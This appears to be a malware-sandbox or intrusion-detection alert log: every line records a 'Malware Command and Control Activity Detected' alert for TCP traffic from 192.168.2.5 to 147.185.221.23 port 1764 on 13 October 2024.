                      2024-10-13T19:11:13.579682+020028529231Malware Command and Control Activity Detected192.168.2.550003147.185.221.231764TCP
                      2024-10-13T19:11:14.939551+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:24.045705+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:27.348962+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:35.952108+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:36.608276+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:47.680864+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:59.162485+020028529231Malware Command and Control Activity Detected192.168.2.550002147.185.221.231764TCP
                      2024-10-13T19:11:59.261133+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.391540+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.515542+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.640594+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.765543+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.876150+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:11:59.984396+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.112129+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.234808+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.359237+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.468663+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.578019+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.687691+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.815588+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:00.937477+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.062882+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.172093+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.296950+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.424126+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.544110+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.699152+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:01.955401+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.078554+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.190449+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.299153+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.416301+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.531163+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.658906+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.781105+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:02.907401+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.015816+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.125062+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.238749+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.359315+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.470187+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.578016+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.687491+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.798218+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:03.906521+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.015572+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.137709+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.249949+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.717676+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:04.921795+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.031402+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.140709+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.250107+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.360379+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.484216+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.593683+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.719197+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.845301+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:05.982159+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.109854+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.235595+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.359315+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.414663+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.468748+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.531166+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.593702+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.656311+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.719237+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.766067+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.860147+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.875083+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:06.985208+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:06.995198+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.112189+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.122277+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.236106+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.243518+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.359736+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.370006+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.488322+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.498778+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.614910+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.634326+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.762718+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.770309+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:07.888843+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:07.899902+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.026691+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.034864+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.171861+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.171990+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.291309+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.301024+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.436985+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.469876+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.569793+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.612440+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.693401+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.747892+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:08.836868+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:08.924912+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:09.041410+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.103592+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:09.243091+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.298114+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:09.649716+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:09.810227+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.036205+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.172361+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.247033+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.370431+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.511725+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.539006+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.677557+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.690879+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.805717+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:10.835119+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:10.941516+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.016661+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.064274+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.161218+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.201551+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.312756+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.317568+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.442153+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.450892+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.574635+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.587271+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.720818+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:11.747844+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:11.988065+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.137160+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.251002+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.281229+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.375056+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.399330+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.499961+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.532891+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.643206+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.679769+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.765617+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.798590+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:12.968776+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:12.974143+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.095426+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.120579+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.240100+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.290573+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.418353+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.464398+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.562549+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.583254+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.728205+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.742030+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:13.879802+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:13.886997+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.002233+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.017757+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.157330+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.167908+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.363773+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.527584+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.574078+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.708463+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.734315+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:14.912747+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:14.916697+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.118966+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.188522+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.389080+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.411312+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.548454+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.587779+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.730341+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:15.741610+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:15.953018+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:16.064764+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:16.248132+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:16.273825+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.012426+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.017309+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.369321+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.447217+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.658320+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.684649+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:17.975156+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:17.975399+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.365347+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.365361+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:18.587055+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.609956+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:18.817595+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:18.835712+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:19.574419+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:19.596150+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:19.873617+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:19.948926+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.084544+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.325538+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.351080+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.515764+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.526347+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.736662+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.745911+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:20.877835+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:20.886460+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.013792+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.081216+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.192567+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.308580+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:21.349009+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:21.431301+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.095058+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.115260+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.232557+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.430561+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.440941+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.658822+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.673457+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:22.781898+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:22.819264+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.004225+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.090074+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.244328+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.262297+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.412210+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.579801+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.595426+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.713797+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.760393+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:23.850608+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:23.921035+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.006148+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.161676+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.352233+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.574517+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.679730+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.733960+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.814751+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.857446+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:24.950074+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:24.997099+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.110595+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.124645+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.293763+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.293998+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.455667+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.466232+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.608734+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.678127+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.774868+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.826062+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:25.895480+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:25.974828+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.028030+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.147160+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.209852+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.287759+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.329015+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.407189+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.471123+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.544504+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:26.607806+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
                      2024-10-13T19:12:26.921835+020028529231Malware Command and Control Activity Detected192.168.2.550012147.185.221.231764TCP
                      2024-10-13T19:12:27.027606+020028529231Malware Command and Control Activity Detected192.168.2.550013147.185.221.231764TCP
